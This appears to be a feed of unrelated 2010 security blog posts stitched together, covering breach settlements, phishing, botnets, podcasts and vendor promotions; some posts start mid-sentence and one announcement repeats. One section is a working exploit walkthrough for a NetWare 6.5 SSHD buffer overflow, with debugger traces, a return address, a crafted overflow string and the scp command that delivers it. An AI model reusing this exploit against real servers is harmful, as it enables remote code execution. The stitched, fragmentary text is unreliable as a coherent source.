But, what about fire insurance for your network endpoints? What if you experience a breach of your network endpoints and your valuable data is stolen? Would you suffer irreversible economic damage? Would you recover from such an incident and be able to continue with your business? Just like the Philadelphia residents back in the 1700’s, you need to protect your most valuable assets which today, aren’t all that different from back then: your data, intellectual property, brand equity, and good name. Your endpoint “fire insurance” should be more about prevention than anything else. Sure, if you suffer a data loss, and you have implemented appropriate safeguards, you may be protected from the legal “firestorm” that may follow if you can demonstrate compliance. But, your best insurance is prevention. Taking steps to avoid a data loss in the first place is definitely worth a pound of cure.

Interestingly, the Ponemon Institute is proposing an innovative business case for companies to justify information security purchases: a return on prevention. Larry Ponemon recently commented, “Because expenditures must be justified to pass budget approval hurdles, we believe our ‘return on prevention’ model can help make it easier for IT and IT security practitioners to make the business case for acquiring enabling security technologies and related control activities.”
Are you employing ‘an ounce of prevention’ when periodically and consistently reviewing the state of your endpoint security? Even with all the talk about needing to have tighter network security, many organizations could use a little more prevention fire insurance. And it doesn’t have to be that difficult to see some big gains to your endpoint security in a hurry. In many ways, it’s back to the basics. We all tend to rest on our laurels when no breach has occurred for awhile. But, that could result in a costly “fire” that could wipe out our business.

You will learn how to apply another ounce of prevention in our ebook and upcoming webcast series: Endpoint Security Fundamentals. Security expert Mike Rothman, founder and president of Securosis will lead us through the steps of how to make your network endpoints more secure. Forget about technical jargon, Mike will tell you what you need to do right now. He’ll explain how to prioritize your security threats, triage your resources to make necessary improvements, and focus your IT staff on the fundamentals of endpoint security. Join us for this three part series: Fixing the Leaky Buckets (September 8), Leveraging the Right Enforcement Controls (September 22), and Building the Endpoint Security Program (October 6).

Ben Franklin may not have had network endpoints to deal with in his day, but he knew that prevention trumps everything when it comes to securing the things we value. I bet he would have made one heck of a security administrator!

And now you have it – through the sheer combined genius of Anton Chuvakin and myself, Andrew Hay.

Administrative items first:

1. We need a new name! We are not entirely happy with “LogChat” and, sadly, “LogTalk” is taken. Please suggest a name – if we pick yours, you get a free signed copy of Anton’s PCI Compliance” book.
2. We will post the transcript, not just the MP3 file – in a few days. If you have ideas for a good/inexpensive transcribing service, we are all ears. We will try Amazon Mechanical Turk first, but it might not be good enough for a technical podcast.

Please also suggest topics to cover as well – even though we are not likely to run out of ideas for a few years. Our first topic today is new log source integration – if it sounds boring…well…listen first/judge second

We plan for this to be a monthly podcast. So, the next one will happen sometime early October.

Any other feedback is HUGELY useful. Is it too long? Too loud? Not enough jokes? Too few mentions of the “cloud”? Feedback please! Who knows…maybe there are more PCI books left in my secret stash and you too will earn that glorious prize for the most useful piece of feedback

And now, in all its, glory – the podcast: the link to MP3 is here [MP3].

Enjoy the log chat!

Heartland Payment Systems has agreed to pay $5 million to Discover to settle claims arising from the massive data breach disclosed by the payment processor last year.

In a brief statement on Wednesday, the Princeton, N.J.-based Heartland said the settlement “resolves all issues” between the two companies stemming from the intrusion.

“This settlement marks our final agreement with a card brand related to the intrusion,” Heartland CEO Robert Carr said in the statement.

In January, Heartland agreed to set aside $60 million to reimburse banks issuing Visa cards, for breach-related costs. Heartland has also agreed to pay $3.6 million to settle claims brought against it by American Express and more than $41 million to reimburse MasterCard issuers for breach-related costs.

In addition to settling with the major card brands, Heartland also has offered to pay $4 million to settle a consolidated consumer class action lawsuit being heard in Texas.

All of the settlement money has come from the $140 million Heartland set aside to cover the costs related to the breach. That amount includes more than $26 million in legal costs.

Heartland, one of the largest processors of payment card transactions in the U.S., disclosed in January 2009 that hackers had broken into its systems in 2008 and stolen credit and debit card data. Authorities later said that data on as many as 130 million credit and debit cards had been stolen, making it the largest ever breach involving payment card data.

The intrusions at Heartland and several other major retailers were later traced to a gang of cyber thieves led by Miami-based Albert Gonzalez who was sentenced in March to 20 years in federal prison.

Source: ComputerWorld

Based on a survey by Symantec Hosted Services and SC Magazine, it found that employee use of the web was perceived as the most likely route to malware infection, with 67.6 per cent of respondents selecting this option ahead of email (28.4 per cent) and instant messenger (3.9 per cent).

Dan Bleaken, senior malware data analyst at Symantec Hosted Services, said:

In some ways, the fact that this is seen as one of the biggest threats is somewhat reassuring. The reality is that the cyber criminals are looking for any way to get in and compromise your business resources and home resources by any means that they can make use of. What we see today is attacks by multiple protocols, so people are used to problems with email such as spam, which can cripple company resources, and also malicious email that can come through, and if a user makes a bad decision and clicks on a link, they can become infected.

Source: SC Magazine

Acunetix announced version 7 of its Web Vulnerability Scanner which features a new vulnerability verifying techniques, scanning engine, support for a wider variety of web applications, improved performance, less false positives and detection of a wide range of new web vulnerability types.

Check out the video below to find out whats new in the Acunetix Web Vulnerability Scanner Version 7.  You can also download the Free version from the Security Tools Page.

1. We need a new name! We are not entirely happy with "LogChat" and, sadly, "LogTalk" is taken. Please suggest a name - if we pick yours, you get a free signed  copy of my "PCI Compliance" book.
2. We will post the transcript, not just the MP3 file - in a few days. If you have ideas for a good/inexpensive transcribing service, we are all ears. I will try Amazon Mechanical Turk first, but it might not be good enough for a technical podcast.
3. Please also suggest topics to cover as well - even though we are not likely to run out of ideas for a few years. Our first topic today is new log source integration - if it sounds boring...well...listen first/judge second :-)
4. We plan for this to be a monthly podcast. So, the next one will happen sometime early October.
5. Any other feedback is HUGELY useful. Is it too long? Too loud? Not enough jokes? Too few mentions of the "cloud"? Feedback please! Who knows...maybe there are more PCI books left in my secret stash and you too will earn that glorious prize for the most useful piece of feedback  :-)

About me: http://www.chuvakin.org

Register for the free RSA Conference Webcast on September 22: Psychotronica: Abusing and Leveraging Intelligence from Social Media http://bit.ly/amDxd4

After Carlos does the tech segment, this episode is not intended for human consumption.

Hosts: Paul "PaulDotCom" Asadoorian,John Strand,Larry Pesce,Carlos Perez

Audio Feeds:

Symantec has teamed up with rapper Snoop Dogg to launch a cybercrime rap contest.

Participants are invited to bust some rhymes on the subject of malware, hacking and botnets for the chance to win an all expenses paid trip to LA to attend a Snoop gig and meet his people, if not the rapper himself. Winners get a Toshiba laptop outfitted (inevitably) with Norton Internet Security 2011. Entry is only open to US residents.

Would-be rappers are invited to submit a two-minute rap video to www.HackIsWack.com before the 30 September deadline. The winner will be selected on the basis of “originality, creativity and message”.

In the meantime the contest is being promoted via Facebook and a dedicated Twitter feed already offering nuggets of wisdom such as “dk man, iz it this spiff or iz @RealWizKhalifa from rollin 20′s snoop hood lmmfao. #blackandYellow #dj #bbm”.

The exercise has the laudable aim of raising awareness about cybercrime but we can’t help fearing the musical results are likely to be dire. When corporate giants team with musical stars to appear “down with the kids” the results are seldom edifying.

Unfortunately early entries to the HackIsWack contest, which launched on Moday, fully vindicate these fears.

Source: The Register

In this video, Niklas Wolff of the CSIS Security Group demonstrates recent integer overflow vulnerability in Adobe Reader (CVE-2010-2862), disclosed at Black Hat in July, that allows remote code execution.

The latest version of iTunes for Windows addresses 13 security vulnerabilities, as well as adding much-publicised social networking functionality.

iTunes 10 for Windows addresses flaws in the media player’s WebKit browser that were fixed in Safari late last month with version 5.0.1 and 4.1.1 of Apple’s browser software.

Apple’s advisory on the security content of iTunes 10 can be found here.

kitten, by Clevergrrl

Have you checked out ISSA Connect yet? The next issue is up there with my column, Trusting Trust. What would we do without a little bit of trust? Our lives would certainly be much less convenient, and has the potential to be more secure.

If you are a member, log into ISSA Connect and join the discussion! Interact with great professionals globally as well as the authors that you enjoy reading every month. If you are not a member, sign up today!

Possibly Related Posts:

• August 2010 Roundup
• Herding Cats August: Embrace the ISA Program
• July 2010 Roundup
• Herding Cats July: Back to Basics
• June 2010 Roundup

I just came across an article that talks about how the use of biometric data for identification can cause a security problem. Here's what this article said:

When biometrics get down to the local gym, however, serious questions must be raised. Your biometric identifiers are immutable and, once stored on a computer, impossible to take back. So if the 24-Hour Fitness database gets hacked and some enterprising Black Hat team of computer experts makes off with this sensitive information, many people could forever lose control of this permanent identification marker. Of course, you could scrape off your fingerprints and replace them with new ones. (This is probably possible). But that's getting a little too close to Total Recall for my taste.

This seems to miss the point of biometrics. Biometric data isn't secret and the security model of biometric identification systems doesn't assume that it is. Instead, biometrics need to ensure that the data that they capture is fresh instead of stored. This subtlety seems to have been missed by the author of this article.

Yeah, I had to re-read that line a few times, too. Which is probably why I’ve put off posting a note here about the article from which the above quote was taken, a thought-provoking essay in the Harvard National Security Journal by Dan Geer, chief information security philosopher officer for In-Q-Tel, the not-for-profit venture capital arm of the Central Intelligence Agency.

The essay is well worth reading for anyone remotely interested in hard-to-solve security problems. Geer is better than most at tossing conversational hand grenades and then walking away, and this piece doesn’t disappoint. For example:

“Looking forward, without universal strong authentication, tomorrow’s cybercriminal will not need the fuss and bother of maintaining a botnet when, with a few hundred stolen credit cards, he will be able to buy all the virtual machines he needs from cloud computing operators. In short, my third conclusion is that if the tariff of security is paid, it will be paid in the coin of privacy.”

Geer’s prose can be long-winded and occasionally sesquipedalian (such as the phrase “Accretive sequestration of social policy”), but then he turns around and shows off his selective economy with words by crafting statements like:

“..demand for security expertise so outstrips supply that the charlatan fraction is rising.”

In the essay, Geer touches on a pet issue of mine: Accountability for insecurity. I recently wrote an editorial for CSO Online addressing a public request for advice by the Federal Communications Commission (FCC), which wants ideas on how to craft a “Cybersecurity Roadmap” as part of its $7 billion national broadband initiative.

In that column, I suggest that the FCC find a way to measure and publish data about the number and longevity of specific cyber security threats resident on domestic ISPs and hosting providers. I also suggest that the government could achieve this goal largely by collecting and analyzing data from the many mainly volunteer-led efforts that are already measuring this stuff.

Geer warns readers that “the demand for ‘safe pipes’ inexorably leads to deputizing those who own the most pipes.” But mine isn’t a “punish or regulate ISPs-for-having-lots-of-security-problems” approach. Instead, it’s more of a “publish a reputation score with the imprimatur of the federal government in the hopes that the ISPs will be shamed into more proactively addressing abuse issues” idea.

Who knows if my idea would work, but it wouldn’t be terribly risky or expensive to try. After all, as Geer said, “security is a means and that game play cannot improve without a scorekeeping mechanism.”

“These are heady problems,” he concludes. “They go to the heart of sovereignty.  They go to the heart of culture.  They go to the heart of ‘Land of the Free and Home of the Brave’.  They will not be solved centrally, yet neither will they be solved without central assistance.  We have before us a set of bargains, bargains between the Devil and the Deep Blue Sea.  And not to decide is to decide.”

Cue the music.

Facilitate a Peer2Peer session at RSA Conference 2011 . Deadline is October 20. http://bit.ly/auAfz9

Related Posts

1. Steve Benson: Stupid Campers
2. Steve Benson: Should
3. Steve Benson: Feeling Better
4. Steve Benson: CageWorld
5. Steve Benson: The Ban

A botnet, first discovered in March via a Honeypot deployment by Arbor Networks, as reared up and taken out several hundred sites, both in the United States and the People’s Republic of China... Oops… More information regarding the botnet, dubbed ‘YoyoDdos’ appears after the jump.

via DarkReading’s Kelly Jackson Higgins: :New DDoS Botnet Hits Nearly 200 Websites“

“A new botnet built for knocking websites offline has attacked mostly Chinese and some U.S. sites, according to researchers. About 90 percent of the command and control servers running YoyoDdos, the nickname given the botnet by researchers at Arbor Networks who have been studying and tracking it, have IP addresses in China, and two-thirds of its victim websites are out of China. The botnet has attacked around 180 websites so far, including 32 in the U.S. “It is a pretty active botnet,” says Jeff Edwards, a research analyst with Arbor who has been analyzing the botnet, which first appeared in Arbor’s honeypot servers back in March. “We’ve detected a lot of attacks coming out of it … [around] ten unique victims a day.” The malware itself isn’t particularly sophisticated, however. “It’s pretty typical of a lot of malware we see,” he says. “It’s a fairly non-sophisticated piece of malware, but effective.”…”

Related Posts

1. Botnet Takedown, FastFlux Flumoxed
2. Host Exploit Reveals Top 50 Nefarious Hosts, Networks
3. Say It Ain’t So Redux: Twitter – The New Botnet Command and Control Vector
4. Offense Best Defense
5. Hulme: New, Sophisticated Stock Manipulation Botnet Ante’s Up

Please join Tenable's own Ron Gula, Renaud Deraison, Marcus Ranum and Paul Asadoorian for a Security Showcase on October 6, from 8:30am to 2:00pm at the New York Marriott East Side, 525 Lexington Ave. at 49th Street in New York City. Breakfast and lunch will be provided during this half-day FREE event.

Topics we will cover include:

During lunch you will also be given a live demonstration of our enterprise solutions as they relate to the themes above.

Contact Donal McRae (dmcrae -at- tenablesecurity.com) to reserve your seat (space is limited for this event). We hope you can make it as the showcase is a rare opportunity to receive firsthand insight from four leading experts.

In "Up in the Air" George Clooney's character loved to travel - for the reward points and the free miles kickback. Now, in business, it's not just the axe man that likes to travel; documents fly all over the place too. But for a business the kickback can be less welcome.

Protecting sensitive information beyond the network perimeter is critical and Information Rights
Management (IRM) is a mature technology that provides an answer.

So where does DLP come into the mix? Well, DLP can be used to identify IRM-protected documents, audit their transfer and - where appropriate - apply IRM classification based on document content. This complements traditional methods for applying IRM such as manual classification by employees.

At Sophos we're really excited about working with a number of IRM vendors, such as Oracle, to achieve exactly this.

Today the Sophos DLP "engine" can identify files protected by both Oracle and Microsoft IRM. As the video below demonstrates, this is actually pretty useful if you use or plan to use IRM.

(Enjoy this video? You can check out more on the SophosLabs YouTube channel and subscribe if you like)

A policy can easily be put in place to simply monitor the transfer of IRM protected file (audit when and how they are leaving your organisation) or even to limit document transfer onto removable storage i.e. only allow files protected by IRM.

IRM provides the document protection and Sophos DLP an enforcement control. Expect to see more on this in the future.

Learn more about Sophos's integrated DLP solution and Oracle's IRM.

http://research.zscaler.com/2010/08/corporate-espionage-for-dummies-hp.html

This really does highlight the fact that, when thinking about security, it is never good to assume anything. Any device attached to your network should be thoroughly examined, and the benefits considered.

Of course, it also is a big failure on the part of HP not to ensure such services are secured by default (or at least must be specifically enabled). Hopefully they’ll fix this, but for now, if you own an HP scanner/printer/fax device, then it’s worth checking you’re not exposing sensitive documents to the wrong people.

Andrew Lee
AVIEN CEO / CTO K7 Computing

The net worth of a business itself could be evaluated in terms of monetary value as well as the trust placed in that organisation by the public. The latter is the most difficult to restore. Data security threats are everywhere from employees that want to take their employer’s ideas to start their own business to threats from new businesses in emerging nations and everything inbetween. Organisations should continue to review data security threats on a continuous basis to enable it to take the necessary steps to address mitigate against those threats because once you are behind the curve it’s game over.

I strongly believe that the competitiveness of businesses like Apple, Microsoft, General Motors, Toyota, Ford, Motorola, HSBC and other businesses can be eroded over the next 20 years if steps are not taken to stem the flow of sensitive information to younger and more hungry competitors. Protecting sensitive data should and must be a core objective of any business aiming to survive the 21st century.

You can access Bill’s blog post by clicking here

ric Walter s'est trompé de métier. Il aurait en effet plus sa place en tournée avec le cirque Pinder qu'à vouloir nous expliquer les rouages d'Internet, monde qui lui est aussi manifestement aussi étranger que la sécurité à certains de ses confrères. Aussi, quand il met en garde les internautes contre les si prévisibles campagnes de spam profitant du battage autour d'HADOPI, on reste pensif.

Commencez donc par aller lire l'excellente analyse publiée ce matin par CNIS Mag' sur le sujet. Puis rebondissez sur l'article paru dans Le Monde qui cite les propos tenus lors du "Tchat" de vendredi dernier...

Éric Walter y conseillait aux utilisateurs de se montrer vigilants vis-à-vis de leur courrier électronique. Ceci étant, un conseil, ça ne coûte rien à donner. Aussi, grand seigneur, il leur expliquait également comment faire la différence entre un véritable email de la HADOPI et un spam. Je cite :

Les mails de recommandation de la Hadopi seront simples et 
nominatifs alors que les spams n'ont pas le nom de l'usager.

Alors ni une ni deux, je me jette sur mes boîtaspams pour y trouver, entre autres joyeusetés, des entêtes de ce genre :

From: Shannan Lavina <slavinaar@add.cc>
To: Cedric Blancher <xxx@xxx>
Subject: Free Bonus Viagra100mg pills with every order, 100%

Ou encore :

From: Aubrey Stephany <aubreypstephany_nc@abunayyangroup.com>
To: Cedric Blancher <yyy@yyy>
Sujet: Rep1icaWatches: Swiss Rep1icaWatch, Buy Perfect Watches
       Clones Cheap from $150 lf

Nous disions donc :

les spams n'ont pas le nom de l'usager

Fail^[1]...

I ran across an interesting and improbable phish today while looking through our spam feeds. The attackers in this case decided that enough people in the world eat at McDonald's that it was worth having a go at convincing people to fill out a survey with the lure of a $90 credit for their participation.

The text of the email reads:

Dear customer, Please give us only 5 minutes of your valuable time to ask you some questions about our products . Please be aware that we will not ask you about any personal information. In return, we will credit $90.00 to your account - just for your time. If you want to answer our simply 8 questions , please click the link below : http://mail.CENSORED/index.html Thank you for helping us to become better . Sincerely, McDonald's Survey Department. Please do not reply to this email. This mailbox is not monitored and you will not receive a response.

You can see from the screenshot that the default character set is set to Cyrillic, which is more than a little strange for an email in English. The entire lure is a bit unlikely, but for every scam, there seems to be a fool who falls for it.

The website the email links to puts on a good show of quizzing you about your favorite McDonald's foods, drinks, etc. Their coding could use some work, though, as every section of the web page has the error "[an error occurred while processing this directive]."

Once you fill out this moderately broken survey you are delivered to the phish itself. As in other phishes I have blogged about, the scammers not only want your name, address and birthday, but also your drivers' license, credit card and CVV.

I am always surprised that people think they can win $90 in a survey or that they may have won 3 million pounds in a UK lottery they never entered. And doesn't anyone wonder how on earth McDonald's or the UK lottery got their email address in the first place?

Sophos customers are protected against these emails, and as always please think before you click.

Create a profile in the RSA Conference Community and contribute! http://bit.ly/b9zNTm

As summer comes to an end there is nothing better than some security researchers who see fit to disclose a new zero day vulnerability every day for a month. That is in fact what the guys over at Abysssec have decided to do to ensure that the criminals (and pen testers) have plenty of ways to compromise our computers.

The good news is that it would appear that the vulnerabilities being disclosed are already patched. All that is new is detailed analysis of the flaws and proof of concept exploits to attack users who have not patched their software. The bad news is that almost no one has a fully patched environment and these disclosures are so detailed that we can expect a flurry of new malware to take advantage of these flaws.

The first two flaws are in cpanel and Adobe Flash and Reader. It appears the current "STABLE" version of cPanel is affected, yet the "CURRENT" and "BETA" releases have been fixed. The Adobe flaws were fixed in 9.3.3 which was released on June 29th, 2010.

While I understand the importance to penetration testers of having working proof of concept and exploit code, I still think I am going to chalk this one up in the "bad idea" column. The typical argument of pressuring vendors to release fixes does not apply, as most already have, which means the press this is receiving is the likely motivation.

Sophos Security Chet Chat episode 24 is now live on http://podcasts.sophos.com. This week Tony Ross our Global Sales Trainer and I discussed this weeks news as well as a detailed exploration of why testing malware on your own might not be such a good idea.

You can also download this podcast directly in MP3 format: Sophos Security Chet Chat 24.

A vulnerability has been identified in NetWare 6.5 SSH which, if exploited

repeated[sic], could be used for a Denial-of-Service Attack. The flaw exists in

SSHD.NLM and one of it's sub-modules, SFTP-SVR.NLM.

The flaw exists within SSHD.NLM. When the application attempts to resolve an 

absolute path on the server, a 512 byte destination buffer is used without

bounds checking. By providing a large enough value, an attacker can cause a

buffer to be overflowed. Successful exploitation results in remote code

execution under the context of the server.

# .m SSHD.NLM

SSHD.NLM         OpenSSH daemon(NICI) 3.7.1p6 (SP8 build 78)

   Loaded from [SYS:SYSTEM\] on Aug 25, 2010   1:15:12 pm

  [145]  OS address space

  Version 3.71.05   October 21, 2008

  Code Address: 8E187000h  Length: 00078EF5h

  Data Address: 9A0A2000h  Length: 0003416Ah

# .m SSHD.NLM

SSHD.NLM         OpenSSH daemon(NICI) 3.7.1p6 (SP8 build 78)

   Loaded from [SYS:SYSTEM\] on Aug 25, 2010   1:15:12 pm

  [145]  OS address space

  Version 3.71.05   October 21, 2008

  Code Address: 8E187000h  Length: 00078EF5h

  Data Address: 9A0A2000h  Length: 0003416Ah

.bss:0002DAE1

.bss:0002DAE1     loc_2DAE1:

.bss:0002DAE1 424 mov     ebx, [ebp+var_40C]

.bss:0002DAE7 424 dec     ebx

.bss:0002DAE8 424 mov     eax, [ebp+var_41C]

.bss:0002DAEE 424 mov     eax, [eax+ebx*4]

.bss:0002DAF1 424 push    eax             ; arg

.bss:0002DAF2 428 mov     eax, [ebp+var_414]

.bss:0002DAF8 428 mov     eax, [eax+60h]

.bss:0002DAFB 428 push    eax             ; arg

.bss:0002DAFC 42C push    offset aSS_8    ; fmt ("%s/%s")

.bss:0002DB01 430 lea     eax, [ebp+var_408]

.bss:0002DB07 430 push    eax             ; dst

.bss:0002DB08 434 call    LIBC@sprintf

.bss:0002DB0D 434 add     esp, 10h

# dds ebp-8

Color Code: Code  Data  Allocated  Free  Mapped  Not Mapped

9A452DC8  --8E228240 ?

9A452DCC  --913249A0 ?

9A452DD0  --9A452DE4 ?

9A452DD4  823EBB98 (LIBC.NLM|ThreadStartFunc+D8)

# dds ebp-8

Color Code: Code  Data  Allocated  Free  Mapped  Not Mapped

9A452DC8  --41414141 ?

9A452DCC  --41414141 ?

9A452DD0  --41414141 ?

9A452DD4  823E0041 (LIBC.NLM|_mf_10to2+B1)

.bss:0002DD9A 424 lea     esp, [ebp-8]

.bss:0002DD9D 00C pop     esi

.bss:0002DD9E 008 pop     ebx

.bss:0002DD9F 004 pop     ebp

.bss:0002DDA0 000 retn

# g

Break at 8E1B4D9A because of break  3 (instruction execute)

Current Focus Processor:  00

EAX = 00000005 EBX = 00000003 ECX = 9A4783A0 EDX = 9A452994

ESI = 9A4529C8 EDI = 94DEB040 EBP = 9A452DD0 ESP = 9A4529B0

EIP = 8E1B4D9A FLAGS = 00000206 (PF IF)

8E1B4D9A?8D65F8         LEA     ESP, [EBP-08]

# u eip 3

8E1B4D9D 5E             POP     ESI

8E1B4D9E 5B             POP     EBX

8E1B4D9F 5D             POP     EBP

# dds esp 3

Color Code: Code  Data  Allocated  Free  Mapped  Not Mapped

9A452DC8  --41414141 ?

9A452DCC  --41414141 ?

9A452DD0  --41414141 ?

# p 3

Break at 8E1B4DA0 because of proceed single step

Current Focus Processor:  00

EAX = 00000005 EBX = 41414141 ECX = 9A4783A0 EDX = 9A452994

ESI = 41414141 EDI = 94DEB040 EBP = 41414141 ESP = 9A452DD4

EIP = 8E1B4DA0 FLAGS = 00000206 (PF IF)

8E1B4DA0 C3             RET

# dds esp

Color Code: Code  Data  Allocated  Free  Mapped  Not Mapped

9A452DD4  823EBB98 (LIBC.NLM|ThreadStartFunc+D8)

# dds esp

Color Code: Code  Data  Allocated  Free  Mapped  Not Mapped

9A452DD4  823E0041 (LIBC.NLM|_mf_10to2+B1)

push esp

ret

[ 'NetWare 6.5 SP8', { 'Ret' => 0x823C870C } ], # push esp - ret (libc.nlm)

$ cat nssh.txt

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBB

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCC\x0c\x87\x3c\x82

\xcc\xcc\xcc\xcc\xcc\xcc\xcc

$ scp user@172.22.33.11:$(echo -e `cat nssh.txt`) .

# dds

Color Code: Code  Data  Allocated  Free  Mapped  Not Mapped

9BADAE14  823C870C (LIBC.NLM|SetThrType+C)

9BADAE18  --CCCCCCCC (LOADER.NLM|UserAddressSpace+C4CCCCC)

9BADAE1C  --00CCCCCC ?

# r

k at 823C870C because of proceed single step

Current Focus Processor:  00

EAX = 00000005 EBX = 43434342 ECX = 9A1367A0 EDX = 9BADA9D4

ESI = 42424242 EDI = 9B8790E0 EBP = 43434343 ESP = 9BADAE18

EIP = 823C870C FLAGS = 00000206 (PF IF)

823C870C 54             PUSH    ESP

# p

Break at 823C870D because of proceed single step

Current Focus Processor:  00

EAX = 00000005 EBX = 43434342 ECX = 9A1367A0 EDX = 9BADA9D4

ESI = 42424242 EDI = 9B8790E0 EBP = 43434343 ESP = 9BADAE14

EIP = 823C870D FLAGS = 00000206 (PF IF)

823C870D C3             RET

# dds

Color Code: Code  Data  Allocated  Free  Mapped  Not Mapped

9BADAE14  --9BADAE18 ?

9BADAE18  --CCCCCCCC (LOADER.NLM|UserAddressSpace+C4CCCCC)

9BADAE1C  --00CCCCCC ?

A vulnerability has been identified in NetWare 6.5 SSH which, if exploited

repeated[sic], could be used for a Denial-of-Service Attack. 

# p

Break at 9BADAE18 because of proceed single step

Current Focus Processor:  00

EAX = 00000005 EBX = 43434342 ECX = 9A1367A0 EDX = 9BADA9D4

ESI = 42424242 EDI = 9B8790E0 EBP = 43434343 ESP = 9BADAE18

EIP = 9BADAE18 FLAGS = 00000206 (PF IF)

9BADAE18 CC             INT     3

# b

Active breakpoints.

 0 E X S 8E1B4AE1 SSHD.NLM|SCPSShellThread+321

 1 E X S 8E1B4A6D SSHD.NLM|SCPSShellThread+2AD

 2 E X S 8E1B47C0 SSHD.NLM|SCPSShellThread

 3 E X S 8E1B4D9A SSHD.NLM|SCPSShellThread+5DA

 4 E X S 8E1B4B0D SSHD.NLM|SCPSShellThread+34D

Possibly Related Posts:

• links for 2010-07-20
• links for 2010-07-19
• links for 2010-07-01
• links for 2010-06-30
• links for 2010-06-15

Websense has been an acting member of the Cloud Security Alliance and our CTO, Dan Hubbard, co-leads the "top threats" working group. The first version of the top threats was presented at both RSA US, 2010 and Blackhat, Vegas, 2010.

However, if there is one thing you be sure of in the threat landscape today, its change!

Therefore the CSA is soliciting feedback on what security professionals believe the most recent top threats are in the Cloud. Nothing too detailed just simply select the cloud domain (IaaS, PaaS, or SaaS) and write description of the area, examples, and possible remediation. All submissions will be read and considered when the next top threats list is released later this year.

To help contribute.... http://www.cloudsecurityalliance.org/topthreats_form.html

There has been another case discovered where Google Code is being used to spread malware yet again.  This latest example was discovered by security firm zScaler, which reported the finding on their research blog on Wednesday.  A spokesman from Google said that the company has taking the necessary steps to remove the project that was hosting the malicious code for violating the terms of service agreement.

At this time it is not certain how long the latest files have been hosted, but zScaler claims one of the executables dates back to late June, 2010, which could be a good indication that Google may have been hosting some or all of the malware for over at least two months now.

Microsoft has released a software tool that helps system administrators protect PCs against a critical class of vulnerabilities found in more than 100 applications from a variety of software makers.

The FixIt Tool works only on machines that have already installed the workaround Microsoft published last week. The latest point-and-click release is designed to make the previous workaround easier to use and fine-tune a variety of settings that will ensure compatibility with applications such as Outlook 2002, members of the Microsoft Security Response Center said.

Check out the article – [The Register]

Today’s episode was hosted by Derek Manky, Fortinet’s project manager, cyber security & threat research. Derek is an advocate of working from the ground up; understanding the drivers and methodologies of cyber crime and threats, then deriving defense strategies. Derek has presented his research world-wide at many security conferences, while educating and promoting cyber-security awareness. He has been recognized as a thought leader in the industry and featured numerous times in top tier publications.

Please check it out and share your comments. Your feedback will help to make future episodes even better.

The Challenge:
Analyze the attached sanitized_log.zip [A.C. – get the logs here] and answer the following questions:

1. Was the system compromised and when? How do you know that for sure? (5pts)
2. If the was compromised, what was the method used? (5pts)
3. Can you locate how many attackers failed? If some succeeded, how many were they? How many stopped attacking after the first success? (5pts)
4. What happened after the brute force attack? (5pts)
5. Locate the authentication logs, was a bruteforce attack performed? if yes how many? (5pts)
6. What is the timeline of significant events? How certain are you of the timing? (5pts)
7. Anything else that looks suspicious in the logs? Any misconfigurations? Other issues? (5pts)
8. Was an automatic tool used to perform the attack? if yes which one? (5pts)
9. What can you say about the attacker's goals and methods? (5pts)

Bonus. What would you have done to avoid this attack? (5pts)

Go get the challenge here and get to solving it – you have about a month. And, yes, there will be prizes too!

Finally, if you really want to make me happy (hehe...who’d want that? :-)), please invent a new approach while solving the challenge.

Possibly related posts:

• Everything tagged Project Honeynet

About me: http://www.chuvakin.org

RSA Conference 2011 registration opens late summer. Register your interest now to receive more information about the theme and contests. http://bit.ly/bvYvbo

Excellent New York Times article gives an excellent glimpse into Russian hacker operations and lifestyle. Interesting how hacking/spamming, according to the article, has been adopted by the government but "civilians" are used as a front:

Computer security researchers have raised a more sinister prospect: that criminal spamming gangs have been co-opted by the intelligence agencies in Russia, which provide cover for their activities in exchange for the criminals’ expertise or for allowing their networks of virus-infected computers to be used for political purposes — to crash dissident Web sites, perhaps.

At RSA in San Francisco a few years ago, Colin Powell was asked why he didn't, as Secretary of State, ask Russia to crack down on hackers.  Secretary Powell explained that he did but the response from his Russian counterpart was, "Your president [Bush] has approval ratings in the 40s and you're telling me what to do?"

1- You said that ESET receives around 200000 unique malware samples daily, so does ESET detect most of them or detect only the malwares that their signatures are listed here: http://www.eset.com/threat-center/threatsense-updates ?

2- Nowadays why signatures are written? Are they written to detect malwares initially, or to cover the gap that heuristic can’t cover? Otherwise, is the main task of detection is of heuristics and signatures are considered supplement for that?

